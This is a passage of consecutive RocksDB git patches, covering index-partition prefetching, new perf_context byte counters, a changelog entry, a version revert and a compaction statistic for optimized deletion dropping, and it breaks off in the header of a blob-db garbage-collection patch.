- s = MaybeLoadDataBlockToCache(rep, read_options, rep->range_del_handle, - Slice() /* compression_dict */, - &rep->range_del_entry); + s = MaybeLoadDataBlockToCache( + prefetch_buffer.get(), rep, read_options, rep->range_del_handle, + Slice() /* compression_dict */, &rep->range_del_entry); if (!s.ok()) { ROCKS_LOG_WARN( rep->ioptions.info_log, @@ -740,21 +802,22 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, // Always prefetch index and filter for level 0 if (table_options.cache_index_and_filter_blocks) { if (prefetch_index_and_filter_in_cache || level == 0) { + const bool pin = + rep->table_options.pin_l0_filter_and_index_blocks_in_cache && + level == 0; assert(table_options.block_cache != nullptr); // Hack: Call NewIndexIterator() to implicitly add index to the // block_cache - // if pin_l0_filter_and_index_blocks_in_cache is true and this is - // a level0 file, then we will pass in this pointer to rep->index - // to NewIndexIterator(), which will save the index block in there - // else it's a nullptr and nothing special happens - CachableEntry<IndexReader>* index_entry = nullptr; - if (rep->table_options.pin_l0_filter_and_index_blocks_in_cache && - level == 0) { - index_entry = &rep->index_entry; - } + CachableEntry<IndexReader> index_entry; unique_ptr<InternalIterator> iter( - new_table->NewIndexIterator(ReadOptions(), nullptr, index_entry)); + new_table->NewIndexIterator(ReadOptions(), nullptr, &index_entry)); + index_entry.value->CacheDependencies(pin); + if (pin) { + rep->index_entry = std::move(index_entry); + } else { + index_entry.Release(table_options.block_cache.get()); + } s = iter->status(); if (s.ok()) { @@ -764,8 +827,7 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, // a level0 file, then save it in rep_->filter_entry; it will be // released in the destructor only, hence it will be pinned in the // cache while this reader is alive - if (rep->table_options.pin_l0_filter_and_index_blocks_in_cache && - level == 0) { + if (pin) { rep->filter_entry = filter_entry; if (rep->filter_entry.value != nullptr) { rep->filter_entry.value->SetLevel(level); @@ -1305,8 +1367,8 @@ InternalIterator* BlockBasedTable::NewDataBlockIterator( if (rep->compression_dict_block) { compression_dict = rep->compression_dict_block->data; } - s = MaybeLoadDataBlockToCache(rep, ro, handle, compression_dict, &block, - is_index); + s = MaybeLoadDataBlockToCache(nullptr /*prefetch_buffer*/, rep, ro, handle, + compression_dict, &block, is_index); } // Didn't get any data from block caches.
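The shape of the optimization is: derive one contiguous byte range covering all index partitions from the first and last partition handles, issue a single Prefetch(), and let the per-partition reads that follow hit the buffer. A condensed sketch of that pattern (the file reader and the two handles are placeholders, and TryReadFromCache() is assumed to keep its offset/length/out-slice shape):

```
// Condensed, hedged sketch of the prefetch-then-read pattern used above.
// `file`, `first_handle`, and `last_handle` stand in for values decoded
// from the top-level index block.
std::unique_ptr<FilePrefetchBuffer> prefetch_buffer(new FilePrefetchBuffer());
uint64_t prefetch_off = first_handle.offset();
uint64_t prefetch_len = last_handle.offset() + last_handle.size() +
                        kBlockTrailerSize - prefetch_off;
// One large sequential read instead of one small IO per partition.
Status s = prefetch_buffer->Prefetch(file.get(), prefetch_off, prefetch_len);

// Subsequent block reads that fall inside the prefetched range can be
// answered from the buffer instead of the file.
Slice contents;
size_t read_len =
    static_cast<size_t>(first_handle.size()) + kBlockTrailerSize;
if (s.ok() && prefetch_buffer->TryReadFromCache(first_handle.offset(),
                                                read_len, &contents)) {
  // Decode the index partition from `contents`.
}
```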
@@ -1355,8 +1417,9 @@ InternalIterator* BlockBasedTable::NewDataBlockIterator( } Status BlockBasedTable::MaybeLoadDataBlockToCache( - Rep* rep, const ReadOptions& ro, const BlockHandle& handle, - Slice compression_dict, CachableEntry<Block>* block_entry, bool is_index) { + FilePrefetchBuffer* prefetch_buffer, Rep* rep, const ReadOptions& ro, + const BlockHandle& handle, Slice compression_dict, + CachableEntry<Block>* block_entry, bool is_index) { const bool no_io = (ro.read_tier == kBlockCacheTier); Cache* block_cache = rep->table_options.block_cache.get(); Cache* block_cache_compressed = @@ -1392,12 +1455,11 @@ Status BlockBasedTable::MaybeLoadDataBlockToCache( std::unique_ptr<Block> raw_block; { StopWatch sw(rep->ioptions.env, statistics, READ_BLOCK_GET_MICROS); - s = ReadBlockFromFile(rep->file.get(), nullptr /* prefetch_buffer*/, - rep->footer, ro, handle, &raw_block, - rep->ioptions, block_cache_compressed == nullptr, - compression_dict, rep->persistent_cache_options, - rep->global_seqno, - rep->table_options.read_amp_bytes_per_bit); + s = ReadBlockFromFile( + rep->file.get(), prefetch_buffer, rep->footer, ro, handle, + &raw_block, rep->ioptions, block_cache_compressed == nullptr, + compression_dict, rep->persistent_cache_options, rep->global_seqno, + rep->table_options.read_amp_bytes_per_bit); } if (s.ok()) { @@ -1420,14 +1482,14 @@ Status BlockBasedTable::MaybeLoadDataBlockToCache( BlockBasedTable::BlockEntryIteratorState::BlockEntryIteratorState( BlockBasedTable* table, const ReadOptions& read_options, const InternalKeyComparator* icomparator, bool skip_filters, bool is_index, - Cleanable* block_cache_cleaner) + std::map<uint64_t, CachableEntry<Block>>* block_map) : TwoLevelIteratorState(table->rep_->ioptions.prefix_extractor != nullptr), table_(table), read_options_(read_options), icomparator_(icomparator), skip_filters_(skip_filters), is_index_(is_index), - block_cache_cleaner_(block_cache_cleaner) {} + block_map_(block_map) {} InternalIterator* BlockBasedTable::BlockEntryIteratorState::NewSecondaryIterator( @@ -1436,23 +1498,15 @@ BlockBasedTable::BlockEntryIteratorState::NewSecondaryIterator( BlockHandle handle; Slice input = index_value; Status s = handle.DecodeFrom(&input); - auto iter = NewDataBlockIterator(table_->rep_, read_options_, handle, nullptr, - is_index_, s); - if (block_cache_cleaner_) { - uint64_t offset = handle.offset(); - { - ReadLock rl(&cleaner_mu); - if (cleaner_set.find(offset) != cleaner_set.end()) { - // already have a reference to the block cache objects - return iter; - } - } - WriteLock wl(&cleaner_mu); - cleaner_set.insert(offset); - // Keep the data into cache until the cleaner cleansup - iter->DelegateCleanupsTo(block_cache_cleaner_); - } - return iter; + auto rep = table_->rep_; + if (block_map_) { + auto block = block_map_->find(handle.offset()); + assert(block != block_map_->end()); + return block->second.value->NewIterator(&rep->internal_comparator, nullptr, + true, rep->ioptions.statistics); + } + return NewDataBlockIterator(rep, read_options_, handle, nullptr, is_index_, + s); } bool BlockBasedTable::BlockEntryIteratorState::PrefixMayMatch( diff --git a/table/block_based_table_reader.h b/table/block_based_table_reader.h index 457edce2205..640a7065645 100644 --- a/table/block_based_table_reader.h +++ b/table/block_based_table_reader.h @@ -181,6 +181,8 @@ class BlockBasedTable : public TableReader { // that was allocated in block cache.
virtual size_t ApproximateMemoryUsage() const = 0; + virtual void CacheDependencies(bool /* unused */) {} + protected: const InternalKeyComparator* icomparator_; @@ -227,7 +229,8 @@ class BlockBasedTable : public TableReader { // @param block_entry value is set to the uncompressed block if found. If // in uncompressed block cache, also sets cache_handle to reference that // block. - static Status MaybeLoadDataBlockToCache(Rep* rep, const ReadOptions& ro, + static Status MaybeLoadDataBlockToCache(FilePrefetchBuffer* prefetch_buffer, + Rep* rep, const ReadOptions& ro, const BlockHandle& handle, Slice compression_dict, CachableEntry<Block>* block_entry, @@ -345,11 +348,11 @@ class BlockBasedTable : public TableReader { // Maitaning state of a two-level iteration on a partitioned index structure class BlockBasedTable::BlockEntryIteratorState : public TwoLevelIteratorState { public: - BlockEntryIteratorState(BlockBasedTable* table, - const ReadOptions& read_options, - const InternalKeyComparator* icomparator, - bool skip_filters, bool is_index = false, - Cleanable* block_cache_cleaner = nullptr); + BlockEntryIteratorState( + BlockBasedTable* table, const ReadOptions& read_options, + const InternalKeyComparator* icomparator, bool skip_filters, + bool is_index = false, + std::map<uint64_t, CachableEntry<Block>>* block_map = nullptr); InternalIterator* NewSecondaryIterator(const Slice& index_value) override; bool PrefixMayMatch(const Slice& internal_key) override; bool KeyReachedUpperBound(const Slice& internal_key) override; @@ -362,8 +365,7 @@ class BlockBasedTable::BlockEntryIteratorState : public TwoLevelIteratorState { bool skip_filters_; // true if the 2nd level iterator is on indexes instead of on user data. bool is_index_; - Cleanable* block_cache_cleaner_; - std::set<uint64_t> cleaner_set; + std::map<uint64_t, CachableEntry<Block>>* block_map_; port::RWMutex cleaner_mu; }; diff --git a/table/table_test.cc b/table/table_test.cc index c55eb425576..178cf4243d7 100644 --- a/table/table_test.cc +++ b/table/table_test.cc @@ -2174,7 +2174,7 @@ std::map MockCache::marked_data_in_cache_; // Block cache can contain raw data blocks as well as general objects. If an // object depends on the table to be live, it then must be destructed before the -// table is closed. This test makese sure that the only items remains in the +// table is closed. This test makes sure that the only items remains in the // cache after the table is closed are raw data blocks. TEST_F(BlockBasedTableTest, NoObjectInCacheAfterTableClose) { for (auto index_type : From ed0a4c93eff6406722142f07cd52b697d7042baa Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Fri, 18 Aug 2017 11:40:36 -0700 Subject: [PATCH 129/205] perf_context measure user bytes read Summary: With this PR, we can measure read-amp for queries where perf_context is enabled as follows: ``` SetPerfLevel(kEnableCount); Get(1, "foo"); double read_amp = static_cast<double>(get_perf_context()->block_read_byte / get_perf_context()->get_read_bytes); SetPerfLevel(kDisable); ``` Our internal infra enables perf_context for a sampling of queries. So we'll be able to compute the read-amp for the sample set, which can give us a good estimate of read-amp.
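The other counters added here can be read the same way; for instance, a hedged sketch for measuring the bytes decoded by an iterator scan (the helper function is illustrative, not part of the patch):

```
#include <memory>

#include "rocksdb/db.h"
#include "rocksdb/iterator.h"
#include "rocksdb/perf_context.h"
#include "rocksdb/perf_level.h"

// Hedged sketch: total user bytes decoded by a full scan, via the new
// iter_read_bytes counter. Assumes `db` is an open rocksdb::DB*.
uint64_t BytesReadByFullScan(rocksdb::DB* db) {
  rocksdb::SetPerfLevel(rocksdb::kEnableCount);
  rocksdb::get_perf_context()->Reset();
  std::unique_ptr<rocksdb::Iterator> it(
      db->NewIterator(rocksdb::ReadOptions()));
  for (it->SeekToFirst(); it->Valid(); it->Next()) {
    // Each key()/value() decoded here contributes to iter_read_bytes.
  }
  it.reset();  // the iterator flushes its local counters on destruction
  uint64_t bytes = rocksdb::get_perf_context()->iter_read_bytes;
  rocksdb::SetPerfLevel(rocksdb::kDisable);
  return bytes;
}
```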
Closes https://github.com/facebook/rocksdb/pull/2749 Differential Revision: D5647240 Pulled By: ajkr fbshipit-source-id: ad73550b06990cf040cc4528fa885360f308ec12 --- db/db_basic_test.cc | 7 ++++++- db/db_impl.cc | 4 +++- db/db_iter.cc | 5 +++++ db/db_iterator_test.cc | 27 +++++++++++++++++++-------- include/rocksdb/perf_context.h | 5 +++++ monitoring/perf_context.cc | 6 ++++++ 6 files changed, 44 insertions(+), 10 deletions(-) diff --git a/db/db_basic_test.cc b/db/db_basic_test.cc index cfbe2c5676a..a2604081b4d 100644 --- a/db/db_basic_test.cc +++ b/db/db_basic_test.cc @@ -360,7 +360,6 @@ TEST_F(DBBasicTest, FLUSH) { WriteOptions writeOpt = WriteOptions(); writeOpt.disableWAL = true; SetPerfLevel(kEnableTime); - ; ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v1")); // this will now also flush the last 2 writes ASSERT_OK(Flush(1)); @@ -369,6 +368,7 @@ TEST_F(DBBasicTest, FLUSH) { get_perf_context()->Reset(); Get(1, "foo"); ASSERT_TRUE((int)get_perf_context()->get_from_output_files_time > 0); + ASSERT_EQ(2, (int)get_perf_context()->get_read_bytes); ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions()); ASSERT_EQ("v1", Get(1, "foo")); @@ -725,6 +725,7 @@ TEST_F(DBBasicTest, FlushOneColumnFamily) { TEST_F(DBBasicTest, MultiGetSimple) { do { CreateAndReopenWithCF({"pikachu"}, CurrentOptions()); + SetPerfLevel(kEnableCount); ASSERT_OK(Put(1, "k1", "v1")); ASSERT_OK(Put(1, "k2", "v2")); ASSERT_OK(Put(1, "k3", "v3")); @@ -738,12 +739,15 @@ TEST_F(DBBasicTest, MultiGetSimple) { std::vector values(20, "Temporary data to be overwritten"); std::vector cfs(keys.size(), handles_[1]); + get_perf_context()->Reset(); std::vector s = db_->MultiGet(ReadOptions(), cfs, keys, &values); ASSERT_EQ(values.size(), keys.size()); ASSERT_EQ(values[0], "v1"); ASSERT_EQ(values[1], "v2"); ASSERT_EQ(values[2], "v3"); ASSERT_EQ(values[4], "v5"); + // four kv pairs * two bytes per value + ASSERT_EQ(8, (int)get_perf_context()->multiget_read_bytes); ASSERT_OK(s[0]); ASSERT_OK(s[1]); @@ -751,6 +755,7 @@ TEST_F(DBBasicTest, MultiGetSimple) { ASSERT_TRUE(s[3].IsNotFound()); ASSERT_OK(s[4]); ASSERT_TRUE(s[5].IsNotFound()); + SetPerfLevel(kDisable); } while (ChangeCompactOptions()); } diff --git a/db/db_impl.cc b/db/db_impl.cc index cdba03915af..a197ca5c8b0 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -990,6 +990,7 @@ Status DBImpl::GetImpl(const ReadOptions& read_options, size_t size = pinnable_val->size(); RecordTick(stats_, BYTES_READ, size); MeasureTime(stats_, BYTES_PER_READ, size); + PERF_COUNTER_ADD(get_read_bytes, size); } return s; } @@ -1117,6 +1118,7 @@ std::vector DBImpl::MultiGet( RecordTick(stats_, NUMBER_MULTIGET_KEYS_READ, num_keys); RecordTick(stats_, NUMBER_MULTIGET_BYTES_READ, bytes_read); MeasureTime(stats_, BYTES_PER_MULTIGET, bytes_read); + PERF_COUNTER_ADD(multiget_read_bytes, bytes_read); PERF_TIMER_STOP(get_post_process_time); return stat_list; @@ -2768,7 +2770,7 @@ Status DBImpl::VerifyChecksum() { const auto& fd = vstorage->LevelFilesBrief(i).files[j].fd; std::string fname = TableFileName(immutable_db_options_.db_paths, fd.GetNumber(), fd.GetPathId()); - s = rocksdb::VerifySstFileChecksum(options, env_options, fname); + s = rocksdb::VerifySstFileChecksum(options, env_options, fname); } } if (!s.ok()) { diff --git a/db/db_iter.cc b/db/db_iter.cc index 801b1102f04..33f926ce07f 100644 --- a/db/db_iter.cc +++ b/db/db_iter.cc @@ -86,6 +86,7 @@ class DBIter: public Iterator { RecordTick(global_statistics, NUMBER_DB_PREV, prev_count_); RecordTick(global_statistics, 
NUMBER_DB_PREV_FOUND, prev_found_count_); RecordTick(global_statistics, ITER_BYTES_READ, bytes_read_); + PERF_COUNTER_ADD(iter_read_bytes, bytes_read_); ResetCounters(); } @@ -1014,6 +1015,7 @@ void DBIter::Seek(const Slice& target) { if (valid_) { RecordTick(statistics_, NUMBER_DB_SEEK_FOUND); RecordTick(statistics_, ITER_BYTES_READ, key().size() + value().size()); + PERF_COUNTER_ADD(iter_read_bytes, key().size() + value().size()); } } } else { @@ -1056,6 +1058,7 @@ void DBIter::SeekForPrev(const Slice& target) { if (valid_) { RecordTick(statistics_, NUMBER_DB_SEEK_FOUND); RecordTick(statistics_, ITER_BYTES_READ, key().size() + value().size()); + PERF_COUNTER_ADD(iter_read_bytes, key().size() + value().size()); } } } else { @@ -1094,6 +1097,7 @@ void DBIter::SeekToFirst() { if (valid_) { RecordTick(statistics_, NUMBER_DB_SEEK_FOUND); RecordTick(statistics_, ITER_BYTES_READ, key().size() + value().size()); + PERF_COUNTER_ADD(iter_read_bytes, key().size() + value().size()); } } } else { @@ -1141,6 +1145,7 @@ void DBIter::SeekToLast() { if (valid_) { RecordTick(statistics_, NUMBER_DB_SEEK_FOUND); RecordTick(statistics_, ITER_BYTES_READ, key().size() + value().size()); + PERF_COUNTER_ADD(iter_read_bytes, key().size() + value().size()); } } if (valid_ && prefix_extractor_ && prefix_same_as_start_) { diff --git a/db/db_iterator_test.cc b/db/db_iterator_test.cc index ea65f3a2603..d3bd164a2c0 100644 --- a/db/db_iterator_test.cc +++ b/db/db_iterator_test.cc @@ -1719,12 +1719,15 @@ TEST_F(DBIteratorTest, IteratorWithLocalStatistics) { std::vector threads; std::function reader_func_next = [&]() { + SetPerfLevel(kEnableCount); + get_perf_context()->Reset(); Iterator* iter = db_->NewIterator(ReadOptions()); iter->SeekToFirst(); // Seek will bump ITER_BYTES_READ - total_bytes += iter->key().size(); - total_bytes += iter->value().size(); + uint64_t bytes = 0; + bytes += iter->key().size(); + bytes += iter->value().size(); while (true) { iter->Next(); total_next++; @@ -1733,20 +1736,25 @@ TEST_F(DBIteratorTest, IteratorWithLocalStatistics) { break; } total_next_found++; - total_bytes += iter->key().size(); - total_bytes += iter->value().size(); + bytes += iter->key().size(); + bytes += iter->value().size(); } delete iter; + ASSERT_EQ(bytes, get_perf_context()->iter_read_bytes); + SetPerfLevel(kDisable); + total_bytes += bytes; }; std::function reader_func_prev = [&]() { + SetPerfLevel(kEnableCount); Iterator* iter = db_->NewIterator(ReadOptions()); iter->SeekToLast(); // Seek will bump ITER_BYTES_READ - total_bytes += iter->key().size(); - total_bytes += iter->value().size(); + uint64_t bytes = 0; + bytes += iter->key().size(); + bytes += iter->value().size(); while (true) { iter->Prev(); total_prev++; @@ -1755,11 +1763,14 @@ TEST_F(DBIteratorTest, IteratorWithLocalStatistics) { break; } total_prev_found++; - total_bytes += iter->key().size(); - total_bytes += iter->value().size(); + bytes += iter->key().size(); + bytes += iter->value().size(); } delete iter; + ASSERT_EQ(bytes, get_perf_context()->iter_read_bytes); + SetPerfLevel(kDisable); + total_bytes += bytes; }; for (int i = 0; i < 10; i++) { diff --git a/include/rocksdb/perf_context.h b/include/rocksdb/perf_context.h index ff1a0caccbe..1095d063bd6 100644 --- a/include/rocksdb/perf_context.h +++ b/include/rocksdb/perf_context.h @@ -30,6 +30,11 @@ struct PerfContext { uint64_t block_read_time; // total nanos spent on block reads uint64_t block_checksum_time; // total nanos spent on block checksum uint64_t block_decompress_time; // total nanos spent 
on block decompression + + uint64_t get_read_bytes; // bytes for vals returned by Get + uint64_t multiget_read_bytes; // bytes for vals returned by MultiGet + uint64_t iter_read_bytes; // bytes for keys/vals decoded by iterator + // total number of internal keys skipped over during iteration. // There are several reasons for it: // 1. when calling Next(), the iterator is in the position of the previous diff --git a/monitoring/perf_context.cc b/monitoring/perf_context.cc index 55df0459bf4..791f4bdbe4e 100644 --- a/monitoring/perf_context.cc +++ b/monitoring/perf_context.cc @@ -40,6 +40,9 @@ void PerfContext::Reset() { block_read_time = 0; block_checksum_time = 0; block_decompress_time = 0; + get_read_bytes = 0; + multiget_read_bytes = 0; + iter_read_bytes = 0; internal_key_skipped_count = 0; internal_delete_skipped_count = 0; internal_recent_skipped_count = 0; @@ -117,6 +120,9 @@ std::string PerfContext::ToString(bool exclude_zero_counters) const { PERF_CONTEXT_OUTPUT(block_read_time); PERF_CONTEXT_OUTPUT(block_checksum_time); PERF_CONTEXT_OUTPUT(block_decompress_time); + PERF_CONTEXT_OUTPUT(get_read_bytes); + PERF_CONTEXT_OUTPUT(multiget_read_bytes); + PERF_CONTEXT_OUTPUT(iter_read_bytes); PERF_CONTEXT_OUTPUT(internal_key_skipped_count); PERF_CONTEXT_OUTPUT(internal_delete_skipped_count); PERF_CONTEXT_OUTPUT(internal_recent_skipped_count); From 5358a805681a901ab0a74330be4c0911dbbe78a9 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Fri, 18 Aug 2017 14:15:25 -0700 Subject: [PATCH 130/205] add VerifyChecksum to HISTORY.md Summary: it's a new feature that'll be released in 5.8, introduced by PR #2498. Closes https://github.com/facebook/rocksdb/pull/2759 Differential Revision: D5661923 Pulled By: ajkr fbshipit-source-id: 9ba9f0d146c453715358ef2dd298aa7765649d7c --- HISTORY.md | 1 + 1 file changed, 1 insertion(+) diff --git a/HISTORY.md b/HISTORY.md index a07337055ab..41dc077eb2c 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -7,6 +7,7 @@ * Replace dynamic_cast<> (except unit test) so people can choose to build with RTTI off. With make, release mode is by default built with -fno-rtti and debug mode is built without it. Users can override it by setting USE_RTTI=0 or 1. * Universal compactions including the bottom level can be executed in a dedicated thread pool. This alleviates head-of-line blocking in the compaction queue, which cause write stalling, particularly in multi-instance use cases. Users can enable this feature via `Env::SetBackgroundThreads(N, Env::Priority::BOTTOM)`, where `N > 0`. * Allow merge operator to be called even with a single merge operand during compactions, by appropriately overriding `MergeOperator::AllowSingleOperand`. +* Add `DB::VerifyChecksum()`, which verifies the checksums in all SST files in a running DB. ### Bug Fixes * Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`. From 0d8e992b47261ea0007499d03def9b3faf4ac3c1 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Fri, 18 Aug 2017 14:18:37 -0700 Subject: [PATCH 131/205] Revert the mistake in version update Summary: https://github.com/facebook/rocksdb/pull/2661 mistakenly updates the version. This patch reverts it. 
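For code that must adapt to this kind of version churn, the ROCKSDB_MAJOR/MINOR/PATCH macros in include/rocksdb/version.h (diffed just below) are the detection mechanism. A minimal, hedged sketch; the feature being gated here is purely illustrative:

    #include <rocksdb/version.h>

    // Compile-time gate on the first release train that ships DB::VerifyChecksum().
    #if ROCKSDB_MAJOR > 5 || (ROCKSDB_MAJOR == 5 && ROCKSDB_MINOR >= 8)
    #define HAVE_ROCKSDB_VERIFY_CHECKSUM 1
    #else
    #define HAVE_ROCKSDB_VERIFY_CHECKSUM 0
    #endif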
Closes https://github.com/facebook/rocksdb/pull/2760 Differential Revision: D5662089 Pulled By: maysamyabandeh fbshipit-source-id: f4735e37921c0ced6081a89080c78ac3728aa8bd --- HISTORY.md | 1 - include/rocksdb/version.h | 2 +- 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 41dc077eb2c..d4478c7d3de 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,7 +1,6 @@ # Rocksdb Change Log ## Unreleased -## 5.7.8 (08/14/2017) ### New Features * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. * Replace dynamic_cast<> (except unit test) so people can choose to build with RTTI off. With make, release mode is by default built with -fno-rtti and debug mode is built without it. Users can override it by setting USE_RTTI=0 or 1. diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index dd11ea7e8e5..fb920cf2e7e 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -5,7 +5,7 @@ #pragma once #define ROCKSDB_MAJOR 5 -#define ROCKSDB_MINOR 8 +#define ROCKSDB_MINOR 7 #define ROCKSDB_PATCH 0 // Do not use these. We made the mistake of declaring macros starting with From 8ace1f79b56f67e37afcc16ca3555b215fccc6ce Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Sat, 19 Aug 2017 14:01:25 -0700 Subject: [PATCH 132/205] add counter for deletion dropping optimization Summary: add this counter stat to track usage of deletion-dropping optimization. if usage is low, we can delete it to prevent bugs like #2726. Closes https://github.com/facebook/rocksdb/pull/2761 Differential Revision: D5665421 Pulled By: ajkr fbshipit-source-id: 881befa2d199838dac88709e7b376a43d304e3d4 --- db/compaction_iteration_stats.h | 2 ++ db/compaction_iterator.cc | 7 ++++++ db/compaction_job.cc | 4 ++++ db/db_compaction_test.cc | 40 +++++++++++++++++++++++++++++++++ include/rocksdb/statistics.h | 7 ++++-- 5 files changed, 58 insertions(+), 2 deletions(-) diff --git a/db/compaction_iteration_stats.h b/db/compaction_iteration_stats.h index 52a666e4e21..ddb534622a5 100644 --- a/db/compaction_iteration_stats.h +++ b/db/compaction_iteration_stats.h @@ -16,6 +16,8 @@ struct CompactionIterationStats { int64_t num_record_drop_obsolete = 0; int64_t num_record_drop_range_del = 0; int64_t num_range_del_drop_obsolete = 0; + // Deletions obsoleted before bottom level due to file gap optimization. + int64_t num_optimized_del_drop_obsolete = 0; uint64_t total_filter_time = 0; // Input statistics diff --git a/db/compaction_iterator.cc b/db/compaction_iterator.cc index 08ae1973409..54726029227 100644 --- a/db/compaction_iterator.cc +++ b/db/compaction_iterator.cc @@ -111,6 +111,7 @@ void CompactionIterator::ResetRecordCounts() { iter_stats_.num_record_drop_obsolete = 0; iter_stats_.num_record_drop_range_del = 0; iter_stats_.num_range_del_drop_obsolete = 0; + iter_stats_.num_optimized_del_drop_obsolete = 0; } void CompactionIterator::SeekToFirst() { @@ -426,6 +427,9 @@ void CompactionIterator::NextFromInput() { // Can compact out this SingleDelete. ++iter_stats_.num_record_drop_obsolete; ++iter_stats_.num_single_del_fallthru; + if (!bottommost_level_) { + ++iter_stats_.num_optimized_del_drop_obsolete; + } } else { // Output SingleDelete valid_ = true; @@ -467,6 +471,9 @@ void CompactionIterator::NextFromInput() { // Note: Dropping this Delete will not affect TransactionDB // write-conflict checking since it is earlier than any snapshot. 
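// The two counters below work together: every dropped tombstone bumps
// num_record_drop_obsolete, and a drop that happens above the bottommost
// level additionally bumps the new num_optimized_del_drop_obsolete, which is
// what makes the usage of this optimization measurable.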
++iter_stats_.num_record_drop_obsolete; + if (!bottommost_level_) { + ++iter_stats_.num_optimized_del_drop_obsolete; + } input_->Next(); } else if (ikey_.type == kTypeMerge) { if (!merge_helper_->HasOperator()) { diff --git a/db/compaction_job.cc b/db/compaction_job.cc index 75f5ab6c85c..1d023ca4563 100644 --- a/db/compaction_job.cc +++ b/db/compaction_job.cc @@ -1014,6 +1014,10 @@ void CompactionJob::RecordDroppedKeys( RecordTick(stats_, COMPACTION_RANGE_DEL_DROP_OBSOLETE, c_iter_stats.num_range_del_drop_obsolete); } + if (c_iter_stats.num_optimized_del_drop_obsolete > 0) { + RecordTick(stats_, COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE, + c_iter_stats.num_optimized_del_drop_obsolete); + } } Status CompactionJob::FinishCompactionOutputFile( diff --git a/db/db_compaction_test.cc b/db/db_compaction_test.cc index bca188a9832..ca77d5b939f 100644 --- a/db/db_compaction_test.cc +++ b/db/db_compaction_test.cc @@ -2684,6 +2684,46 @@ TEST_P(DBCompactionTestWithParam, IntraL0CompactionDoesNotObsoleteDeletions) { ASSERT_TRUE(db_->Get(roptions, Key(0), &result).IsNotFound()); } +TEST_F(DBCompactionTest, OptimizedDeletionObsoleting) { + // Deletions can be dropped when compacted to non-last level if they fall + // outside the lower-level files' key-ranges. + const int kNumL0Files = 4; + Options options = CurrentOptions(); + options.level0_file_num_compaction_trigger = kNumL0Files; + options.statistics = rocksdb::CreateDBStatistics(); + DestroyAndReopen(options); + + // put key 1 and 3 in separate L1, L2 files. + // So key 0, 2, and 4+ fall outside these levels' key-ranges. + for (int level = 2; level >= 1; --level) { + for (int i = 0; i < 2; ++i) { + Put(Key(2 * i + 1), "val"); + Flush(); + } + MoveFilesToLevel(level); + ASSERT_EQ(2, NumTableFilesAtLevel(level)); + } + + // Delete keys in range [1, 4]. These L0 files will be compacted with L1: + // - Tombstones for keys 2 and 4 can be dropped early. + // - Tombstones for keys 1 and 3 must be kept due to L2 files' key-ranges. + for (int i = 0; i < kNumL0Files; ++i) { + Put(Key(0), "val"); // sentinel to prevent trivial move + Delete(Key(i + 1)); + Flush(); + } + dbfull()->TEST_WaitForCompact(); + + for (int i = 0; i < kNumL0Files; ++i) { + std::string value; + ASSERT_TRUE(db_->Get(ReadOptions(), Key(i + 1), &value).IsNotFound()); + } + ASSERT_EQ(2, options.statistics->getTickerCount( + COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE)); + ASSERT_EQ(2, + options.statistics->getTickerCount(COMPACTION_KEY_DROP_OBSOLETE)); +} + INSTANTIATE_TEST_CASE_P(DBCompactionTestWithParam, DBCompactionTestWithParam, ::testing::Values(std::make_tuple(1, true), std::make_tuple(1, false), diff --git a/include/rocksdb/statistics.h b/include/rocksdb/statistics.h index b4629358e66..731ff780963 100644 --- a/include/rocksdb/statistics.h +++ b/include/rocksdb/statistics.h @@ -105,8 +105,9 @@ enum Tickers : uint32_t { COMPACTION_KEY_DROP_OBSOLETE, // The key is obsolete. COMPACTION_KEY_DROP_RANGE_DEL, // key was covered by a range tombstone. COMPACTION_KEY_DROP_USER, // user compaction function has dropped the key. - COMPACTION_RANGE_DEL_DROP_OBSOLETE, // all keys in range were deleted. + // Deletions obsoleted before bottom level due to file gap optimization. 
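// A hedged read-side sketch, assuming a Statistics object was installed via
// Options::statistics (the test above uses the same call):
//   uint64_t n = options.statistics->getTickerCount(
//       COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE);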
+ COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE, // Number of keys written to the database via the Put and Write call's NUMBER_KEYS_WRITTEN, @@ -264,7 +265,9 @@ const std::vector> TickersNameMap = { {COMPACTION_KEY_DROP_RANGE_DEL, "rocksdb.compaction.key.drop.range_del"}, {COMPACTION_KEY_DROP_USER, "rocksdb.compaction.key.drop.user"}, {COMPACTION_RANGE_DEL_DROP_OBSOLETE, - "rocksdb.compaction.range_del.drop.obsolete"}, + "rocksdb.compaction.range_del.drop.obsolete"}, + {COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE, + "rocksdb.compaction.optimized.del.drop.obsolete"}, {NUMBER_KEYS_WRITTEN, "rocksdb.number.keys.written"}, {NUMBER_KEYS_READ, "rocksdb.number.keys.read"}, {NUMBER_KEYS_UPDATED, "rocksdb.number.keys.updated"}, From 4624ae52c91d8f4ecdb94451a544c844c06db777 Mon Sep 17 00:00:00 2001 From: yiwu-arbug Date: Sun, 20 Aug 2017 16:56:01 -0700 Subject: [PATCH 133/205] GC the oldest file when out of space Summary: When out of space, blob db should GC the oldest file. The current implementation GCs the newest one instead. Fixing it. Closes https://github.com/facebook/rocksdb/pull/2757 Differential Revision: D5657611 Pulled By: yiwu-arbug fbshipit-source-id: 56c30a4c52e6ab04551dda8c5c46006d4070b28d --- utilities/blob_db/blob_db_impl.cc | 60 +++++++++++++++++++------------ utilities/blob_db/blob_db_impl.h | 15 ++++---- utilities/blob_db/blob_db_test.cc | 35 ++++++++++++++++++ 3 files changed, 81 insertions(+), 29 